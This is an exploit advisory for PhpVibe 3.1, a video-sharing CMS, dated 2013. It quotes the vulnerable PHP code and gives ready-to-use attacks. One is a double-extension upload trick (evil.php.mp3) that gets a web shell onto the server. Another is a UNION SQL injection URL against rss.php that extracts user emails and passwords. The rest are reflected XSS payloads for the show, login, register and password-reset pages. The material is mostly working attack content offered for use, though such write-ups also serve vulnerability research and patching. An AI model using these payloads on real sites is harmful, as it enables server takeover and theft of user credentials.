###########################################################################################
#Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilities
#Product: PhpVibe
#Official site: http://phprevolution.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 23/08/2013
###########################################################################################
+----------+
| OVERVIEW |
+----------+
PhpVibe is a premium video-sharing CMS, with or without upload. It supports all main video-sharing websites like YouTube, Vimeo, Dailymotion, Metacafe
and flv, mp4, mp3 uploads. No ffmpeg is required. The upload option can be turned off.
+-----------------------------------------------------------------------------------+
+-------------------------------------+
| Remote Arbitrary File Upload Vuln |
+-------------------------------------+
Affected file : upload.php
...............................................
if ($_FILES['file']['name']!='') { $fileName= $_FILES['file']['name']; $fileSize = $_FILES['file']['size']; $ext = substr($fileName, strrpos($fileName, '.') + 1); if (in_array($ext,$allowedExts) or empty($allowedExts)) { if ($fileSize<$maxFileSize or empty($maxFileSize)) { $target_path = $target_path . basename( $_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) { echo '{"success":true, "file": "'.$target_path.'"}'; vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name'])); } else{ echo '{"success":false, "details": "move_uploaded_file failed"}'; } } else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); }; } else echo('{"success":false, "details": "File type '.$ext.' 
not allowed."}'); } else echo '{"success":false, "details": "No file received."}';
Real exploitation: to exploit this vuln, you must be a registered user. Go to the upload video area http://server/upload and upload your evil file as evil.php.mp3 or file.php.mp4 or file.php.flv. The check above only reads the text after the last dot, so the inner .php extension is never rejected, and the file is then stored under its original basename in a web-served directory; whether the server actually executes it as PHP depends on its handler configuration.
Shell access : <audio class="wp-audio-shortcode" id="audio-94922-2" preload="none" style="width: 100%;" controls="controls"><source type="audio/mpeg" src="http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3?_=2" /><a href="http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3">http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3</a></audio>
Demo : server/media/flv/august-23-13-5-10-pm-evil.php.flv
+-----------------------------------------------------------------------------------+
+---------------+
| SQL Injection |
+---------------+
PhpVibe is possibly vulnerable to SQL Injection attacks; affected file : rss.php , param : cat (the value read from the query string is concatenated into the SQL statement without escaping).
affected code : //rss.php , line 24
function clean_feed($input) { $original = array("<", ">", "&", '"', "'", "<br/>", "<br>"); $replaced = array("<", ">", "&", ""","'", "", ""); $newinput = str_replace($original, $replaced, $input); return $newinput; } echo'<?xml version="1.0" encoding="utf-8"?> <rss version="2.0"> <channel> '; echo ' <title>'.$seo_title.'</title> <description>'.$seo_desc.'</description> <link>'.$site_url.'</link> '; if($cat = MK_Request::getQuery('cat')) { $vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30"); } else { $vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30"); } while($videosData = mysql_fetch_array($vbox_result)) { $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/'; $rss_datetime = $videosData["date"]; echo ' <item> <title>'.strip_tags($videosData['title']).'</title> <link><![CDATA['.$url.']]></link> <guid><![CDATA['.$url.']]></guid> <pubDate>'.$rss_datetime.'</pubDate> 
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description> </item> '; } echo'</channel> 
PoC : http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
+--------------------------------------------------------------------------------------+
+-----------+
|XSS Attack |
+-----------+
Multiple XSS vulnerabilities have been detected in phpVibe 3.1.
1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
example : http://server/show/'">><marquee><h1>XSS</h1></marquee>
2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. The vulnerabilities are reported in version 3.1. Other versions may also be affected.
example :
http://server/forgot-pass.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
+--------------------------------------------------------------------------------------+
Knowledge is not an object, it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra www.Iss4m.ma ./Issam IEBOUBEN Aka Esac